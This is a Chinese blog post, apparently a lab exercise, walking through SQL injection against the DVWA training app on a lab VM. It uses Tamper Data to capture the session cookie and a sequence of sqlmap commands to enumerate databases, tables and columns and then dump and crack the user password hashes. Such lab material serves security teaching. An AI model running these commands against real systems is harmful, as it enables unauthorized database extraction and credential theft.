版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创!
恰饭广告
实验之前请先阅读这篇文章:(https://www.idaobin.com/explain)
任务描述:
学习Sqlmap(命令行自动SQL注入工具)的使用实现代码清单4-12的效果P160
任务环境说明:
攻击机:BT5
靶机:Web 服务器靶机
攻击机安装服务/工具2:Tamper Data插件
攻击机安装服务/工具3:sqlmap
攻击机安装服务/工具4:
实现步骤:
1. 火狐浏览器安装Tamper Data插件
bt5r3上自带着Tamper Data只是没有启用,启用插件即可
选择Enable,允许启用插件
允许启用之后,还需重新加载插件
2. 使用Tamper Data 获取Cookie信息
在Tamper Data的web界面下获取Cookie信息
web界面下启动Tamper Data
点击start Tamper,开始探测浏览器打开的每一个链接的cookie信息
然后返回浏览器,地址栏输入目标地址为http://10.10.10.129/dvwa/login.php
回车以后弹出一个警告框,选择Tamper
点击Tamper以后,点击OK
这里获取到目标页面的cookie安全等级比较高,需要登录dvwa应用把安全等级调低为low,账号密码都为admin
登录dvwa后台以后,设置安全等级为low并提交
设置安全等级以后,进入SQL Injection页面查看是否有SQL注入漏洞
在User ID输入框中输入任意值并提交
得到目标页面为http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#
运用以上方法获得了目标页面(http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#)的cookie值,并把它全部内容复制下来
3. 通过sqlmap进行注入攻击
bt5默认没有sqlmap命令,只能通过脚本来运行
cd /pentest/database/sqlmap
python sqlmap.py -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low;PHPSESSID=gb3klnkpq9tanl6f4puuobe124'
参数:
-u 指定目标页面的URL链接
–cookie 指定目标页面的安全等级和PHPSESSID
注意:命令不能复制,参数值使用实验获取到了web服务器的操作系统版本以及PHP、Apache、MySQL的版本信息
结果:实验获取到了web服务器的操作系统版本以及PHP、Apache、MySQL的版本信息
通过sqlmap获取数据库名
python sqlmap.py -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low;PHPSESSID=gb3klnkpq9tanl6f4puuobe124' --dbs -v 0
参数:
-dbs 列出所有数据库
-v 设置详细级别 (级别为0-6,默认为1)
0 只显示Python的回溯,错误和关键消息
1 显示信息和警告消息
2 显示调试消息
3 显示有效载荷注入
4 显示HTTP请求
5 显示HTTP响应头
6 显示HTTP响应页面的内容
结果:实验获取到了web应用的数据库名称为dvwa,information_schema为系统数据库MySQL自带的
通过sqlmap获取表名
python sqlmap.py -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low;PHPSESSID=gb3klnkpq9tanl6f4puuobe124' --D dvwa --table
参数:
-D 指定数据库名
–tables 列出指定数据库中的表
结果:实验获取到dvwa数据库存在两个表,分别为guestbook和users
通过sqlmap获取列名
python sqlmap.py -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low;PHPSESSID=gb3klnkpq9tanl6f4puuobe124' --D dvwa --table -T users --columns
参数:
-T 指定表名
— columns 列出字段
结果:实验获取到了数据库中表名为users存在6个字段
通过sqlmap导出password列的内容
python sqlmap.py -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low;PHPSESSID=gb3klnkpq9tanl6f4puuobe124' --D dvwa --table -T users --columns --dump
参数:
–dump 列出指定数据库的表的字段的数据
注意:sqlmap会询问3次,第一次询问是否要求破解密码(y确定/n否/q退出),第二次要求调用密码字典(直接按回车默认即可),第三次询问要求是否普通的密码后缀(y/确定/n否)
获取结果如下
实验获取到了web应用后台数据库的所有用户账户和哈希值,并将数据保存为CSV表格文件
实验获取到了管理员的账号和密码都为admin
原文链接:https://www.idaobin.com/archives/669.html
让我恰个饭吧.ヘ( ̄ω ̄ヘ)
恰饭广告